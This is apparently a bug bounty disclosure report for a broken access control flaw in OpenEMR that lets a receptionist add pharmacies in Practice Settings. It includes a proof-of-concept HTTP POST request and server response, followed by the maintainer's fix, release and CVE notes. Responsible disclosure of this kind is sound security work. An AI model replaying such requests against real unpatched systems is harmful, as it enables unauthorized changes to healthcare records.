Broken Access Controls in Pratice settings in openemr/openemr

Valid

Reported on

Dec 26th 2022

Description

We observed that a receptionist user can add a Pharmacy in the Pratice Settings section, although this area is restricted to receptionist users.

Proof of Concept

REQUEST:

POST /openemr/controller.php?practice_settings&pharmacy&action=edit HTTP/1.1
Host: demo.openemr.io
Cookie: OpenEMR=<receptionist user's cookie>
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 144
Origin: https://demo.openemr.io
Referer: https://demo.openemr.io/openemr/controller.php?practice_settings&pharmacy&action=edit

form_id=&name=test_pharmarcy&address_line1=11&address_line2=11&city=&state=&zip=&email=&phone=&fax=&npi=&ncpdp=&transmit_method=1&id=&process=true

RESPONSE:

HTTP/1.1 302 Found
Server: nginx/1.21.1
Date: Mon, 26 Dec 2022 09:02:28 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/8.0.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Location: /openemr/controller.php?practice_settings&pharmacy&action=list
Content-Length: 9246

<!DOCTYPE html>
<html>
<head>
    <title>Practice Settings</title>

    
<meta charset="utf-8" />
...

PoC Image

image

After we send the request above image

there is a new pharmacy added image

Impact

This vulnerability allows a front desk user to add any pharmacy, which could break the logic of the application.

We are processing your report and will contact the openemr team within 24 hours. 5 months ago
We have contacted a member of the openemr team and are waiting to hear back 5 months ago
openemr/openemr maintainer has acknowledged this report 5 months ago
Brady Miller validated this vulnerability 4 months ago
Nhien.IT has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Brady Miller
4 months ago

Maintainer

This is fixed is in master branch at https://github.com/openemr/openemr/commit/bb4244c83a74628faafabc0598366f49863914a9

@Nhien.IT, @admin, I am unable to mark this as fixed, since that requires hard-setting a publish date, which I am unable to safely predict. We plan to release OpenEMR 7.0.1 in about 3-4 weeks, which will include this fix. At that time (after release OpenEMR 7.0.1), we will then mark this issue as fixed (and publish at that time with a cve).

thanks for the report @Nhien.IT !

Nhien.IT
4 months ago

Researcher

Hi @maintainer,

Thanks for your effort, I hope to publish a fix version soon.

Regards.

Nhien.IT
14 days ago

Researcher

Hi @maintainer,

I have received mail about 7.0.1 version being published.Any update here?

Brady Miller marked this as fixed in 7.0.1 with commit bb4244 14 days ago
The fix bounty has been dropped
This vulnerability has been assigned a CVE
Brady Miller published this vulnerability 14 days ago
to join this conversation